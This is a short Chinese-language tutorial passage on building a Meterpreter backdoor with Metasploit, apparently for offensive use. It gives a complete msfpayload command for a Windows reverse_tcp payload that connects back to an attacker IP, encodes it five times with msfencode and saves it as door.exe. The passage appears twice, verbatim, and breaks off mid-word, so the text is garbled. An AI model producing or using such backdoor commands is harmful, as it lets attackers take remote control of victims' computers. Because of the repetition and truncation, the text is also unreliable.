使用示例:
1.生成Meterpreter后门
命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe
这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
use exploit/mult
使用示例:
1.生成Meterpreter后门
命令语句如下,如果其中的IP为kali攻击机的IP地址,后面跟着的是参数。
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.223 LPORT=2333 R|msfencode -t exe -c 5 > /root/door.exe
这个语句中,如果不知道参数是什么,可以在metasploit中查看,查看方式如下
use exploit/mult